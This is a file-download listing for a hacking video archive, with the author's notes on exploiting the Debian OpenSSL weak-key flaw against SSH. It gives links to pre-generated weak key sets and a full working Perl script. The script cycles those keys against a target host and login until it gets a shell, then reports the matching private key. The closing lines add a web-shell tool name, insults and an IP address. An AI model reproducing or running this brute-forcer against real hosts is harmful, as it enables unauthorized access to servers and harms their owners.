File download
- File size:
- 25 786 834 bytes (24.59M)
- File date:
- 2016-07-27 05:45:02
- Download count:
- all-time: 77
Preview
- Debian_OpenSSL_Bruteforce.avi 27.84M
- Debian_OpenSSL_Bruteforce.txt 3.86K
file_id.diz
---------------------------------------------------------
--- Debian OpenSSL Bruteforce
--- author: F0rtress Zer0 (mail - last frame)
---------------------------------------------------------
music: Trent Reznor - Damnation (from quake)
Pre-generated keyfiles:
http://sugar.metasploit.com/debian_ssh_dsa_1024_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 <- THIS USED
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 <- MIRROR
http://sugar.metasploit.com/debian_ssh_rsa_1023_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_1024_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_2047_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_4096_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_8192_1_4100_x86.tar.bz2
Brutforcer script code:
--- BEGIN ---
#!/usr/bin/perl
use strict;
use warnings;
## SSH keyfile bruteforce script
## Coded by Fortress Zero (nomina.sunt.odiosa@gmail.com)
my $keysPerConnect = 6;
my $usage = "\nUsage: ./script.pl <pathToKeys> <host> <login>\n";
my $path = shift or die($usage."Path to keys is not specified\n");
my $host = shift or die($usage."Host is not specified\n");
my $login = shift or die($usage."Login is not specified\n");
die or chdir($path);
opendir(A, $path) or die("\nerr: could not open dir\n");
print "\nCounting all keys...\n";
my @kez;
while ($_ = readdir(A)) {
chomp;
# filter only private keys
next unless m,^\w+-\d+$,;
push(@kez, $_);
}
my $full = $#kez+1;
print "TOTAL ".$full." number of keys\n";
print "BRUTEFORCE attack start\n";
my $cmdsCount = int($full/$keysPerConnect);
my $pre_cmd = "ssh -o \"BatchMode yes\" -l ".$login;
my $post_cmd = ' '.$host.' "id;exit"';
my $clock_start = time();
my $time_elapsed = 0;
my $time_left = 0;
for(my $i = 1; $i <= $cmdsCount; $i++){
$time_elapsed = time()-$clock_start;
$time_left = int($time_elapsed/$i*($cmdsCount-$i));
printf "%06d/%06d - %02d:%02d:%02d/%02d:%02d:%02d\n",
$i,
$cmdsCount,
(gmtime($time_elapsed))[2],
(gmtime($time_elapsed))[1],
(gmtime($time_elapsed))[0],
(gmtime($time_left))[2],
(gmtime($time_left))[1],
(gmtime($time_left))[0];
my $mid_cmd = '';
for(my $j = 0; $j < $keysPerConnect; $j++){
my $cur = shift(@kez);
$mid_cmd.= " -i ".$cur;
}
my $ret = system($pre_cmd.$mid_cmd.$post_cmd);
if($ret!=65280){
## seems that we've got shell
my @valid = split ' -i ',$mid_cmd;
shift @valid;
print "Valid pack of keys found\n";
print "Trying to determine correct key...\n";
foreach (@valid) {
print $_."\n";
my $ret2 = system($pre_cmd.' -i '.$_.$post_cmd);
if($ret2!=65280){
print "PRIVATE KEY FOUND\nTHIS IS IT -> ".$_." <-\n";
die("SUCCESS!!!!\n");
}
}
print "Looks like false alarm...\n";
}
}
print "Small amount of keys remaining,\nTrying one-by-one\n";
foreach (@kez) {
print $_."\n";
my $ret3 = system($pre_cmd.' -i '.$_.$post_cmd);
if($ret3!=65280){
print "You fucking lucky!\n";
print "PRIVATE KEY FOUND\nTHIS IS IT -> ".$_." <-\n";
die("SUCCESS!!!!\n");
}
}
print "SHIT! BRUTEFORCE FAILED!\n";
exit;
--- END ---
Software seen in video:
- Windows XP SP2
- OperaUSB 9.51
- r57shell 1.4
- portaputty
- Ubuntu 7.10
Software used for creation:
- MS Virtual PC 2007
- VMWare Player
- Ubuntu 7.10 (2 times)
- BB Flashback recorder 1.5.6
- Macromedia Flash MX 2004
- Nero WaveEditor 3.9.1.0
- Audacity 1.2.6
- DivX Codec
- LAME MP3 encoder/decoder
---
Hack the planet!
Keep private!
Cheat script-kiddies!
---
Hello gobzer!
Hello Molot!
Hello AFX!
Hello flufx!
Hello kostapc!
hello unknown from cc06 (nokia, your DVD) - contact me!
---
Fuck you Trash !!!(245659,982399,tgbr,92.245.59.233)
Antichat abused my video! I HATE YOU!
---
I know kung-foo
You can now hire me for something legal - contact thru email